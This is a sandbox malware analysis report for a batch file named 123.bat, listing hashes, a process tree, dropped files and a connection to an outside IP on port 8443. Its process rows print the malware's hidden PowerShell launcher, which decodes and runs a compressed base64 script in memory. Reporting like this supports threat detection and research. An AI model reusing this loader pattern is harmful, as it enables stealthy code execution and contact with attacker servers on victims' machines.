| Field | Value |
|---|---|
| File name | 123.bat |
| Full analysis | https://app.any.run/tasks/bd1473e6-7800-4e2c-ad51-13113ee6f61a |
| Verdict | Malicious activity |
| Analysis date | February 19, 2019, 08:24:06 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators | — |
| MIME | text/plain |
| File info | ASCII text, with very long lines, with no line terminators |
| MD5 | C8BBA730C977B6A0A00C2FC0CE0C0CD5 |
| SHA1 | 1CFB2E8DFFFC341FACB4C18D535B3F107CEE0B0B |
| SHA256 | 3C251349B7733B4C9893526870BA8295403C96719E2C8CF413DB40569A4C04AC |
| SSDEEP | 48:dVIaWMaMUc6/2rcmilWrSsquUFlPvoRV1mSTXDjDeRpsQ3S4CKCVVYWX:tSlIcZ/kkhg1mS7DjiRptTbC7Yq |
| PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 3124 | cmd /c ""C:\Users\admin\AppData\Local\Temp\123.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
| 3924 | powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
| 2256 | "powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3924 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BUPOU0DIPIKMNWH2MYV0.temp | — | — | — |
| 2256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A6SHM723XT31NM74BPPX.temp | — | — | — |
| 3924 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 2BCAD5DA21CB41B727ABDE7D6B6990B8 | AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |
| 2256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 2BCAD5DA21CB41B727ABDE7D6B6990B8 | AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |
| 2256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20ebcb.TMP | binary | 2BCAD5DA21CB41B727ABDE7D6B6990B8 | AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |
| 3924 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20e90c.TMP | binary | 2BCAD5DA21CB41B727ABDE7D6B6990B8 | AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3 |
| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 2256 | powershell.exe | 89.144.25.94:8443 | — | GHOSTnet GmbH | DE | unknown |